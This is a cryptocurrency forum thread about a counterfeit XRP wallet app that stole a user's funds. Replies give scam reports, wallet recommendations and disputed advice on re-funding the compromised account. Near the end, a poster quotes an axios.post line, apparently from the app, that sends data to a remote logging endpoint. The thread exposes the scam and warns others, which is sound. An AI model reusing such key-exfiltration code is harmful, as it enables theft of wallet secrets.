Scammed by Peninsula Software

So today I needed to import a private key with around 14600 XRP on it and transfer the money to an exchange. I have a new iphone that doesn't currently have a wallet on it. So I went to the app store and downloaded the first wallet that came up. I did quickly google is toast wallet safe and the results said it was considered safe. So I went ahead and imported the private key and instantly before I could send to the exchange all the XRP was transferred to address: rnmmg1qsvjzitv5toy32dsh8zgdqsw6dzf which is a known scam account.

The software company that produces toast wallet plus also does drop wallet. "Peninsula Software S.A.S. de C.V."

So what to do now? I know the coins are gone but I have a new mission now, to get them taken down. Been buying and selling and mining crypto since 2010 and first time I've gotten scammed. What makes this worse is these weren't my coins, but a friends who wanted me to buy them because he didn't know how. This friend is in a bad situation and needs money now which is why I was converting them.

Sorry to hear it,

To make sure you're aware, the official Toast Wallet has been discontinued, anything resembling it on the app stores is probably a scam.

Can you report the developer on the App Store? Looks like they're also on Google Play https://play.google.com/store/apps/developer?id=Peninsula+Software+S.A.S.+de+C.V..

I don't know what else you can do but report to law enforcement, and post about it on XRP sites to warn people.

Hi Bob,  This situation should not be allowed to happen !  After being touted as a GOOD Wallet designed for XRP it is discontinued without fore warning. The same situation as the XRP HARBOR Wallet, shut down with no prior warning. A friend and I both have XRP Bags and Harbor was the recommended Wallet for them at the time, some 3yrs ago. The Harbor Wallet itself cannot be used for any of it's functions but we are waiting for news of a Wallet with a future before using Private key's etc to move them. Why the F*** aren't Ripple creating a rock solid Wallet for the Zerp ?   I suspect that You are not alone with this Rip-Off...  Hopefully the Law can intervene and bring the THIEVES the Karma they deserve.

@3GO3D  Ripple are prevented from developing wallets by regulators

Thanks Paym8, I am now a bit more informed than uninformed.  Nevertheless a dedicated Wallet built to stand the test of time is desperately needed, especially now when the price is readying itself for it's best Year yet. A lot of Hodlers are loosing their Zerps when having to migrate from a dying Wallet to the next one " recommended " This will be a relevant factor in those supporting Banks as custodians.

That wallet is called XUMM (for Android and iOS). The developers, XRPL Labs are well known here, highly reputable and have been funded in part by Ripple. The lead developer is a member of the forum @Wietse

The other thing to remember is that a wallet will likely still do what it previously did regardless of whether it is still supported or not.

Obviously that can depend on how the network is accessed,  but Toast Wallet for instance still works fine on the devices it’s installed on.

In the world of software there is NEVER anything that will be certain to persist through the years.  Everything eventually needs an upgrade.  But as @PunishmentOfLuxury has indicated above,  the one that looks to be in the mainstream at the moment is XUMM.

I wish I had a Dogecoin for every time I’ve seen someone unfairly blame Ripple for the wallet situation.   :)

For everyone that is scammed by this guy: with your secret you should still be able to claim your flare airdrop. At this point, the XRP wallet is deleted (yes, this guy wanted your last 15 XRP too...) But if you do it like this, you can re-enable the wallet

1. fund your wallet again with at least 20 XRP and immediately after that, change the regular key AND disable the master key. The scammer still has access, so you need to do this before he deletes the wallat again and you losse another 20 XRP...

2. check if it all works. You should be able to sign a transaction with your regular key, but not with your old master key

3. Set the flare address (again) and you should be fine.

I do not guarantee it will work, but I guess it will: the snapshot was taken with your account, and if Flare scans for your address, they find your flare address.

Maybe someone with a Flare connection could confirm?

I would not suggest this. This guy has automated scripts (maybe axios build in commands?) located here that are likely monitoring secret keys in case they get reused. I.E. he is a real scumbag.

axios.post("https://dropletapi.peninsulasoftware.co/api/log", data)
